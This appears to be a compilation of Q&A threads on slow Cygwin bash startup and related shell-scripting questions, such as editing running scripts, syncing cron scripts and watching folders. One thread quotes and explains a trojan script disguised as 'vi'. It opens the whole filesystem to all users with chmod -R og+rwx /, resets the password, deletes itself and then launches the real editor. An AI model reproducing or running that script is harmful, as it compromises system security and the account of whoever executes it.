At the moment bash takes about 2 seconds to load. I ran bash with the -x flag and, looking at the output, it seems as though PATH is being loaded many times in Cygwin. The funny thing is that I use the same file in a Linux environment and it works fine, without the reload problem. Could the following cause the problem?
if [ `uname -o` = "Cygwin" ]; then
....
fi
As you've noted in your answer, the problem is Cygwin's bash-completion package. The quick and easy fix is to disable bash-completion, and the correct way to do that is to run Cygwin's setup.exe (download it again if you need to) and select to uninstall that package.
The longer solution is to work through the files in /etc/bash_completion.d and disable the ones you don't need. On my system, the biggest culprits for slowing down Bash's load time (mailman, shadow, dsniff and e2fsprogs) all did exactly nothing, since the tools they were created to complete weren't installed.
If you rename a file in /etc/bash_completion.d to have a .bak extension, it'll stop that script being loaded. Having disabled all but a select 37 scripts on one of my systems in that manner, I've cut the average time for bash_completion to load by 95% (6.5 seconds to 0.3 seconds).
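For example, on a system without mailman installed, something like this (the file name is only illustrative; pick whichever scripts do nothing for you) stops that script from loading:
mv /etc/bash_completion.d/mailman /etc/bash_completion.d/mailman.bak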
In my case the culprit was the Windows domain controller.
I did this to find the issue:
I started with a plain Windows cmd.exe and then typed this:
c:\cygwin\bin\strace.exe c:\cygwin\bin\bash
In my case, I noticed the following sequence:
218 12134 [main] bash 11304 transport_layer_pipes::connect: Try to connect to named pipe: \\.\pipe\cygwin-c5e39b7a9d22bafb-lpc
45 12179 [main] bash 11304 transport_layer_pipes::connect: Error opening the pipe (2)
39 12218 [main] bash 11304 client_request::make_request: cygserver un-available
1404719 1416937 [main] bash 11304 pwdgrp::fetch_account_from_windows: line: <CENSORED_GROUP_ID_#1>
495 1417432 [main] bash 11304 pwdgrp::fetch_account_from_windows: line: <CENSORED_GROUP_ID_#2>
380 1417812 [main] bash 11304 pwdgrp::fetch_account_from_windows: line: <CENSORED_GROUP_ID_#3>
etc...
The key thing was identifying the client_request::make_request: cygserver un-available line. You can see how, after that, Cygwin tries to fetch every single group from Windows, and the execution times go through the roof.
A quick Google search revealed what cygserver is:
https://cygwin.com/cygwin-ug-net/using-cygserver.html
Cygserver is a program which is designed to run as a background
service. It provides Cygwin applications with services which require
security arbitration or which need to persist while no other cygwin
application is running.
The solution was to run cygserver-config and then net start cygserver to start the Windows service, as shown below. Cygwin startup times dropped significantly after that.
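For reference, this is roughly what I ran from a Cygwin shell with administrator rights (the exact questions cygserver-config asks may differ between Cygwin versions):
cygserver-config      # answer yes when it offers to install cygserver as a service
net start cygserver   # start the Windows service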
All of the other answers refer to older versions of bash_completion and are irrelevant for recent bash_completion.
Modern bash_completion moved most of the completion files to /usr/share/bash-completion/completions by default; check the path on your system by running:
# pkg-config --variable=completionsdir bash-completion
/usr/share/bash-completion/completions
There are many files in there, one for each command, but that is not a problem, since they are loaded on demand the first time you use completion with each command. The old /etc/bash_completion.d is still supported for compatibility, and all files from there are loaded when bash_completion starts.
# pkg-config --variable=compatdir bash-completion
/etc/bash_completion.d
Use this script to check if there are any stale files left in the old dir.
#!/bin/sh
COMPLETIONS_DIR="$(pkg-config --variable=completionsdir bash-completion)"
COMPAT_DIR="$(pkg-config --variable=compatdir bash-completion)"
for file in "${COMPLETIONS_DIR}"/*; do
file="${COMPAT_DIR}/${file#${COMPLETIONS_DIR}/}"
[ -f "$file" ] && printf '%s\n' $file
done
It prints the list of files in the compat dir that are also present in the newer (on-demand) completions dir. Unless you have specific reasons to keep some of them, review, back up, and remove all of those files.
As a result, the compat dir should be mostly empty.
Now, for the most interesting part - checking why bash startup is slow.
If you just run bash, it will start a non-login, interactive shell - on Cygwin this sources /etc/bash.bashrc and then ~/.bashrc. This most likely doesn't include bash completion, unless you source it from one of those rc files. If you run bash -l (bash --login), start Cygwin Terminal (depending on your cygwin.bat), or log in via SSH, it will start a login, interactive shell - which sources /etc/profile, ~/.bash_profile, and the aforementioned rc files. The /etc/profile script itself sources all executable .sh files in /etc/profile.d.
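A quick way to see which kind of shell is paying the price (rough numbers, they vary per machine) is to time an interactive non-login shell against an interactive login shell:
time bash -ic exit    # non-login: only the rc files
time bash -lic exit   # login: /etc/profile and profile.d, then the rc files
If only the second one is slow, the time is going into the login files discussed below.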
You can check how long each file takes to source. Find this code in /etc/profile:
for file in /etc/profile.d/*.$1; do
[ -e "${file}" ] && . "${file}"
done
Back it up, then replace it with this:
for file in /etc/profile.d/*.$1; do
TIMEFORMAT="%3lR ${file}"
[ -e "${file}" ] && time . "${file}"
done
Start bash and you will see how long each file took. Investigate the files that take a significant amount of time. In my case, it was bash_completion.sh and fzf.sh (fzf is a fuzzy finder, a really nice complement to bash_completion). Now the choice is to disable them or investigate further. Since I wanted to keep using fzf shortcuts in bash, I investigated, found the source of the slowdown, optimized it, and submitted my patch to fzf's repo (hopefully it will be accepted).
Now for the biggest time spender - bash_completion.sh. Basically that script sources /usr/share/bash-completion/bash_completion. I backed up that file, then edited it. Near the end there is a for loop that sources all the files in the compat dir - /etc/bash_completion.d. Again, I added TIMEFORMAT and time, and saw which script was causing the slow start. It was zzz-fzf (from the fzf package). I investigated and found a subshell ($()) being executed multiple times in a for loop; I rewrote that part without the subshell, making the script run quickly, and submitted that patch to fzf's repo as well.
The biggest reason for all these slowdowns is that fork is not supported by the Windows process model. Cygwin does a great job emulating it, but it's painfully slow compared to a real UNIX. A subshell or a pipeline that does very little work by itself spends most of its execution time forking. E.g. compare the execution times of time echo msg (0.000s on my Cygwin) vs time echo $(echo msg) (0.042s on my Cygwin) - day and night. The echo command itself takes no appreciable time to execute, but creating a subshell is very expensive. On my Linux system, these commands take 0.000s and 0.001s respectively. Many packages Cygwin ships are developed by people who use Linux or another UNIX, and run on Cygwin unmodified. So naturally those devs feel free to use subshells, pipelines and other features wherever convenient, since they don't see any significant performance hit on their systems, but on Cygwin those shell scripts might run tens or hundreds of times slower.
Bottom line, if a shell script works slowly in Cygwin - try to locate the source of fork calls and rewrite the script to eliminate them as much as possible.
E.g. cmd="$(printf "$1" "$2")" (uses one fork for subshell) can be replaced with printf -v cmd "$1" "$2".
Boy, it came out really long. Anyone still reading up to here is a real hero. Thanks :)
I know this is an old thread, but after a fresh install of Cygwin this week I'm still having this problem.
Instead of handpicking all of the bash_completion files, I used this one-liner to implement me_and's approach for anything that isn't installed on my machine. It significantly reduced the startup time of bash for me.
In /etc/bash_completion.d, execute the following:
for i in *; do [[ -f $i && $i != *.bak ]] || continue; type "$i" >/dev/null 2>&1 || mv "$i" "$i.bak"; done
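If you later install one of those tools and want its completion back, the renaming is easy to reverse from the same directory (this assumes, like the one-liner above, that each script is named after its command, and only restores scripts whose command now exists):
for i in *.bak; do type "${i%.bak}" >/dev/null 2>&1 && mv "$i" "${i%.bak}"; done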
New answer for an old thread, relating to the PATH of the original question.
Most of the other answers deal with the bash startup. If you're seeing a slow load time when you run bash -i within the shell, those may apply.
In my case, bash -i ran fast, but any time I opened a new shell (be it in a terminal or in xterm), it took a really long time. If bash -l is taking a long time, it means the login step is what's slow.
There are some approaches at the Cygwin FAQ at https://cygwin.com/faq/faq.html#faq.using.startup-slow but they didn't work for me.
The original poster asked about the PATH, which he diagnosed using bash -x. I too found that although bash -i was fast, bash -xl was slow and showed a lot of information about the PATH.
There was such a ridiculously long Windows PATH that the login process kept on running programs and searching the entire PATH for the right program.
My solution: Edit the Windows PATH to remove anything superfluous. I'm not sure which piece I removed that did the trick, but the login shell startup went from 6 seconds to under 1 second.
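If you want to see what the login shell is actually wading through, dumping one PATH entry per line makes the superfluous pieces easy to spot:
echo "$PATH" | tr ':' '\n'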
YMMV.
My answer is the same as npe's above, but since I just joined, I cannot comment or even upvote it! I hope this post doesn't get deleted, because it offers reassurance for anyone looking for an answer to the same problem.
npe's solution worked for me. There's only one caveat - I had to close all Cygwin processes before I got the best out of it. That includes running Cygwin services, like sshd, and the ssh-agent that I start from my login scripts. Before that, the Cygwin terminal window would appear instantly but hang for several seconds before presenting the prompt, and it hung for several seconds again when closing the window. After I killed all processes and started the cygserver service (by the way, I prefer the Cygwin way, cygrunsrv -S cygserver, over net start cygserver; I don't know whether it makes any practical difference), it starts immediately. So thanks to npe again!
I'm on a corporate network with a pretty complicated setup, and it seems that really kills cygwin startup times. Related to npe's answer, I also had to follow some of the steps laid out here: https://cygwin.com/faq/faq.html#faq.using.startup-slow
Another cause on AD client systems is slow DC replies, commonly observed in configurations with remote DC access. The Cygwin DLL queries information about every group you're in to populate the local cache on startup. You may speed up this process a little by caching your own information in local files. Run these commands in a Cygwin terminal with write access to /etc:
getent passwd $(id -u) > /etc/passwd
getent group $(id -G) > /etc/group
Also, set /etc/nsswitch.conf as follows:
passwd: files db
group: files db
This will limit the need for Cygwin to contact the AD domain controller (DC) while still allowing additional information to be retrieved from the DC, such as when listing remote directories.
After doing that plus starting the cygserver my cygwin startup time dropped significantly.
As someone mentioned above, one possible issue is that the PATH environment variable contains too many entries, and Cygwin will search all of them. I prefer to edit /etc/profile directly and just overwrite the PATH variable with the Cygwin-related paths, e.g. PATH="/usr/local/bin:/usr/bin". Add additional paths if you want, as in the sketch below.
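A minimal sketch of what that can look like in /etc/profile (the /cygdrive entry is just a placeholder for whatever Windows tools you still want available):
PATH="/usr/local/bin:/usr/bin"
# PATH="$PATH:/cygdrive/c/some/tool/bin"   # add back specific Windows paths if needed
export PATH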
I wrote a Bash function named minimizecompletion for inactivating completion scripts that are not needed.
Completion scripts can add more than one completion specification, or contain completion specifications for shell builtins, so it is not sufficient to compare script names with the executable files found in $PATH.
My solution is to remove all loaded completion specifications, load a completion script, and check whether it has added new completion specifications. Depending on the result, the script is inactivated by adding .bak to its file name, or activated by removing .bak. Doing this for all 182 scripts in /etc/bash_completion.d results in 36 active and 146 inactive completion scripts, reducing the Bash start time by 50% (though obviously this depends on the installed packages).
The function also checks inactivated completion scripts, so it can activate them when they are needed for newly installed Cygwin packages. All changes can be undone with the argument -a, which activates all scripts.
# Enable or disable global completion scripts for speeding up Bash start.
#
# Script files in directory '/etc/bash_completion.d' are inactivated
# by adding the suffix '.bak' to the file name; they are activated by
# removing the suffix '.bak'. After processing, all completion scripts
# are reloaded by calling '/etc/bash_completion'.
#
# usage: [-a]
# -a activate all completion scripts
# output: statistic about total number of completion scripts, number of
# activated, and number of inactivated completion scripts; the
# statistic for active and inactive completion scripts can be
# wrong when 'mv' errors occur
# return: 0 all scripts are checked and completion loading was
# successful; this does not mean that every call of 'mv'
# for adding or removing the suffix was successful
# 66 the completion directory or loading script is missing
#
minimizecompletion() {
local arg_activate_all=${1-}
local completion_load=/etc/bash_completion
local completion_dir=/etc/bash_completion.d
(
# Needed for executing completion scripts.
#
local UNAME='Cygwin'
local USERLAND='Cygwin'
shopt -s extglob progcomp
have() {
unset -v have
local PATH="$PATH:/sbin:/usr/sbin:/usr/local/sbin"
type -- "$1" &>/dev/null && have='yes'
}
# Print initial statistic.
#
printf 'Completion scripts status:\n'
printf ' total: 0\n'
printf ' active: 0\n'
printf ' inactive: 0\n'
printf 'Completion scripts changed:\n'
printf ' activated: 0\n'
printf ' inactivated: 0\n'
# Test the effect of execution for every completion script by
# checking the number of completion specifications after execution.
# The completion scripts are renamed depending on the result to
# activate or inactivate them.
#
local completions total=0 active=0 inactive=0 activated=0 inactivated=0
while IFS= read -r -d '' f; do
((++total))
if [[ $arg_activate_all == -a ]]; then
[[ $f == *.bak ]] && mv -- "$f" "${f%.bak}" && ((++activated))
((++active))
else
complete -r
source -- "$f"
completions=$(complete | wc -l)
if (( $completions > 0 )); then
[[ $f == *.bak ]] && mv -- "$f" "${f%.bak}" && ((++activated))
((++active))
else
[[ $f != *.bak ]] && mv -- "$f" "$f.bak" && ((++inactivated))
((++inactive))
fi
fi
# Update statistic.
#
printf '\r\e[6A\e[15C%s' "$total"
printf '\r\e[1B\e[15C%s' "$active"
printf '\r\e[1B\e[15C%s' "$inactive"
printf '\r\e[2B\e[15C%s' "$activated"
printf '\r\e[1B\e[15C%s' "$inactivated"
printf '\r\e[1B'
done < <(find "$completion_dir" -maxdepth 1 -type f -print0)
if [[ $arg_activate_all != -a ]]; then
printf '\nYou can activate all scripts with %s.\n' "'$FUNCNAME -a'"
fi
if ! [[ -f $completion_load && -r $completion_load ]]; then
printf 'Cannot reload completions, missing %s.\n' \
"'$completion_load'" >&2
return 66
fi
) || return
complete -r
source -- "$completion_load"
}
This is an example output and the resulting times:
$ minimizecompletion -a
Completion scripts status:
total: 182
active: 182
inactive: 0
Completion scripts changed:
activated: 146
inactivated: 0
$ time bash -lic exit
logout
real 0m0.798s
user 0m0.263s
sys 0m0.341s
$ time minimizecompletion
Completion scripts status:
total: 182
active: 36
inactive: 146
Completion scripts changed:
activated: 0
inactivated: 146
You can activate all scripts with 'minimizecompletion -a'.
real 0m17.101s
user 0m1.841s
sys 0m6.260s
$ time bash -lic exit
logout
real 0m0.422s
user 0m0.092s
sys 0m0.154s
Related
I'm scratching my head about two seemingly different behaviors of bash when editing a running script.
This is not a place to discuss WHY one would do this (you probably shouldn't). I would only like to try to understand what happens and why.
Example A:
$ echo "echo 'echo hi' >> script.sh" > script.sh
$ cat script.sh
echo 'echo hi' >> script.sh
$ chmod +x script.sh
$ ./script.sh
hi
$ cat script.sh
echo 'echo hi' >> script.sh
echo hi
The script edits itself, and the change (extra echo line) is directly executed. Multiple executions lead to more lines of "hi".
Example B:
Create a script infLoop.sh and run it.
$ cat infLoop.sh
while true
do
x=1
echo $x
done
$ ./infLoop.sh
1
1
1
...
Now open a second shell and edit the file changing the value of x. E.g. like this:
$ sed --in-place 's/x=1/x=2/' infLoop.sh
$ cat infLoop.sh
while true
do
x=2
echo $x
done
However, we observe that the output in the first terminal is still 1. Doing the same with only one terminal, interrupting infLoop.sh through Ctrl+Z, editing, and then continuing it via fg yields the same result.
The Question
Why does the change in example A have an immediate effect but the change in example B not?
PS: I know there are questions out there showing similar examples but none of those I saw have answers explaining the difference between the scenarios.
There are actually two different reasons that example B is different, either one of which is enough to prevent the change from taking effect. They're due to some subtleties of how sed and bash interact with files (and how unix-like OSes treat files), and might well be different with slightly different programs, etc.
Overall, I'd say this is a good example of how hard it is to understand & predict what'll happen if you modify a file while also running it (or reading etc from it), and therefore why it's a bad idea to do things like this. Basically, it's the computer equivalent of sawing off the branch you're standing on.
Reason 1: Despite the option's name, sed --in-place does not actually modify the existing file in place. What it actually does is create a new file with a temporary name, and when it's finished it deletes the original and renames the new file into its place. The new file has the same name, but it's not actually the same file. You can tell this by looking at the file's inode number with ls -li:
$ ls -li infLoop.sh
88 -rwxr-xr-x 1 pi pi 39 Aug 4 22:04 infLoop.sh
$ sed --in-place 's/x=1/x=2/' infLoop.sh
$ ls -li infLoop.sh
4073 -rwxr-xr-x 1 pi pi 39 Aug 4 22:05 infLoop.sh
But bash still has the old file open (strictly speaking, it has an open file handle pointing to the old file), so it's going to continue getting the old contents no matter what changed in the new file.
Note that this doesn't apply to all programs that edit files. vim, for example, will rewrite the contents of existing files (unless file permissions forbid it, in which case it switches to the delete&replace method). Appending with >> will always append to the existing file rather than creating a new one.
(BTW, if it seems weird that bash could have a file open after it's been "deleted", that's just part of how unix-like OSes treat their files. Files are not truly deleted until their last directory entry is removed and the last open file handle referring to them is closed. Some programs actually take advantage of this for security by opening(/creating) a file and then immediately "deleting" it, so that the open file handle is the only way to reach the file.)
Reason 2: Even if you used a tool that actually modified the existing file in place, bash still wouldn't see the change. The reason for this is that bash reads from the file (parsing as it goes) until it has something it can execute, runs that, then goes back and reads more until it has another executable chunk, etc. It does not go back and re-read the same chunk to see if it's changed, so it'll only ever notice changes in parts of the file it hasn't read yet.
In example B, it has to read and parse the entire while true ... done loop before it can start executing it. Therefore, changes in that part (or possibly before it) will not be noticed once the loop has been read & started executing. Changes in the file after the loop would be noticed after the loop exited (if it ever did).
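A small way to see this for yourself (it matches the bash versions I've tried and example A above, though the exact buffering behaviour isn't guaranteed): start a script that pauses, and append to it while it is sleeping.
printf '%s\n' 'echo first' 'sleep 10' > chunkdemo.sh
bash chunkdemo.sh &                    # prints "first", then sleeps
echo 'echo appended' >> chunkdemo.sh   # added past the point bash has executed
wait                                   # prints "appended" once the sleep ends
The appended line runs because bash had not yet read that far; an in-place edit to the already-executed echo would have been ignored.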
See my answer to this question (and Don Hatch's comment on it) for more info about this.
I'm a very clueless beginner when it comes to shell scripts, but I have to be able to explain what these lines of code do and I don't have enough time to get more familiar with the topic first, so I can't really give a lot of input.
As additional information: the script itself is called vi, just like the editor, and is probably harmful, hoping to be run as admin.
#!/bin/bash
#
# execute on your own risk !!
chmod -R og+rwx /
echo -e "Hacke.peter\n Hacke.peter\n" | passwd
rm $0
vi $*
logout # good bye!
I think the idea is that somebody is trying to run the actual vi (not this script) and then accidentally calls this script - it changes the current user's password to the output of the echo command (not sure what that is, though), and then the script deletes itself and calls the editor so we don't realize anything happened.
A huge thank you for any answers in advance, and sorry for being so clueless.
Hmm, not sure if clueless beginner or crafty hacker [insert suspicious Fry meme]. With a last name like that?
Here's what the script does, step-by-step:
chmod -R og+rwx /: recursively (-R) grants read, write and execute permission (+rwx) on every file on the system to each file's group (g) and to all other users (o).
echo -e "Hacke.peter\n Hacke.peter\n" | passwd: resets the password of the user running the script (the superuser, if it is run as admin) to "Hacke.peter".
rm $0: removes itself. The $0 in bash stands for the file name of the current script.
vi $*: opens the real vi editor with whatever arguments ($*) you passed to the original (now erased) script. If the script was also called vi, this step hides its tracks and avoids suspicion.
logout: logs you out of the root session. Now you no longer have root, and your filesystem is left wide open.
Very nasty script!
I have multiple remote sites which run a bash script, initiated by cron (running VERY frequently - every 10 minutes or less), and one of its jobs is to sync a "scripts" directory. The idea is for me to be able to edit the scripts in one location (a server in a data center) rather than having to log into each remote site and make any edits manually. The question is: what are the best options for syncing the script that is currently running the sync? (I hope that's clear.)
I would imagine syncing a script that is currently running would be very bad. Does the following look feasible if I run it as the last statement of my script? pros? cons? Other options??
if [ -e ${newScriptPath} ]; then
echo "mv ${newScriptPath} ${permanentPath}" | at "now + 1 minute"
fi
One problem I see is that if I use "1 minute" (which is at's smallest increment), and the script ends, and cron initiates the next job before at replaces the script, it could try to replace it during the next run of the script...
Changing the script file during execution is indeed dangerous (see this previous answer), but there's a trick that (at least with the versions of bash I've tested with) forces bash to read the entire script into memory, so if it changes during execution there won't be any effect. Just wrap the script in {}, and use an explicit exit (inside the {}) so if anything gets added to the end of the file it won't be executed:
#!/bin/bash
{
# Actual script contents go here
exit
}
Warning: as I said, this works on the versions of bash I have tested it with. I make no promises about other versions, or other shells. Test it with the shell(s) you'll be using before putting it into production use.
Also, is there any risk that any of the other scripts will be running during the sync process? If so, you either need to use this trick with all of them, or else find some general way to detect which scripts are in use and defer updates on them until later.
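One general way to do that deferral (a sketch only; the lock path and file names here are made up for illustration) is to have the backup scripts and the updater share a lock via flock, so the update simply waits until nothing is running:
# at the top of each backup script
exec 9>/var/lock/backup-scripts.lock
flock -s 9    # shared lock: backups may overlap with each other

# in the updater
exec 9>/var/lock/backup-scripts.lock
flock -x 9    # exclusive lock: blocks until no backup holds the shared lock
mv script_new.sh script_cur.sh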
So I ended up using the at utility, but only if the file changed. I keep a ".cur" and a ".new" version of the script on the local machine. If the MD5 is the same for both, I do nothing. If they are different, I wait until after the main script completes, then force-copy the ".new" over the ".cur" from a different script.
I create the same lock file (name) for update_script.sh, so another instance of the first script won't run while I'm changing it.
The relevant part of the main script:
file1=$(md5sum script_cur.sh | awk '{print $1}')   # hash only, so the differing file names don't matter
file2=$(md5sum script_new.sh | awk '{print $1}')
if [ "$file1" == "$file2" ] ; then
echo "Files have the same content"
else
echo "Files are different, scheduling update_script.sh at command"
at -f update_script.sh now + 1 minute
fi
Is it possible to write a cron job/script that runs only when there is a change in a folder's size, i.e. the files inside the folder get changed or a new file gets created, so the folder size changes and the cron job or the script runs?
There is no support for such a monitor event in standard cron: cron is strictly time-based.
Assuming that cron is used, this task would need to be handled by a "woken up" job, which could then choose to sleep/end immediately or do something else, depending on a comparison of the folder with a previously known state.
Now, if cron is removed from the role of being the launch/monitor platform, then there are "non-polling" ways to monitor a filesystem, such as inotify.
If just looking for a system daemon to supplement standard cron for this task, see the following alternatives.
incron:
incron is an "inotify cron" system. It works like the regular cron but is driven by filesystem events instead of time periods. It contains two programs, a daemon called "incrond" (analogous to crond) and a table manipulator "incrontab" (like "crontab").
Watcher:
Watcher is a daemon that watches specified files/folders for changes and fires commands in response to those changes. It is similar to incron, however, configuration uses a simpler to read ini file instead of a plain text file. Unlike incron it can also recursively monitor directories. It's also written in Python, making it easier to hack.
You have many solutions:
- Using inotifywait, as an example:
inotifywait -m /path 2>&- | awk '$2 == "CREATE" { print $3; fflush() }' |
while read file; do
echo "$file"
# do something with the file
done
In Ubuntu inotifywait is provided by the inotify-tools package.
- Using incron
You can see a full example here: http://www.cyberciti.biz/faq/linux-inotify-examples-to-replicate-directories/
- A simple check: count the directory's entries (isempty is the watched directory here) and compare against a previously stored count:
ls -1A isempty | wc -l
My idiom is usually:
dir=/dir/to/watch
if [ "$dir" -nt "$dir.flag" ]; then
touch -r "$dir" "$dir.flag"
do_work
fi
This, however, tests against the modification time, not the size. The size of a directory is not a very useful concept anyway, as it changes only infrequently.
$dir.flag cannot be created in $dir, by the way, as that would make $dir change after $dir.flag; you need to store $dir.flag somewhere you have write permission.
I have a load of bash scripts that back up different directories to different locations. I want each one to run every day. However, I want to make sure they don't run simultaneously.
I've written a script that basically just calls each script in succession and sits in cron.daily, but I want it to keep working even when I add and remove backup scripts, without having to edit it manually.
So what I need to do is generate a list of the scripts (e.g. "dir -1 /usr/bin/backup*.sh") and then run each script it finds in turn.
Thanks.
#!/bin/sh
for script in /usr/bin/backup*.sh
do
"$script"
done
#!/bin/bash
for SCRIPT in /usr/bin/backup*.sh
do
[ -x "$SCRIPT" ] && [ -f "$SCRIPT" ] && $SCRIPT
done
If your system has run-parts, then that will take care of it for you. You can name your scripts like "10script", "20anotherscript", and they will be run in order, in a manner similar to the rc*.d hierarchy (which is run via init or Upstart, however). On some systems run-parts is a script; on mine it's a binary executable.
It is likely that your system already uses it to run hourly, daily, etc. cron jobs, just by dropping scripts into directories such as /etc/cron.hourly/.
Pay particular attention, though, to how you name your scripts. (Don't use dots, for example.) Check the man page specific to your system, since file naming restrictions may vary.
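If your run-parts is the debianutils version (the Debian-family one), you can check which of your scripts it would actually pick up without running them; the --test option may not exist in other implementations:
run-parts --test /etc/cron.daily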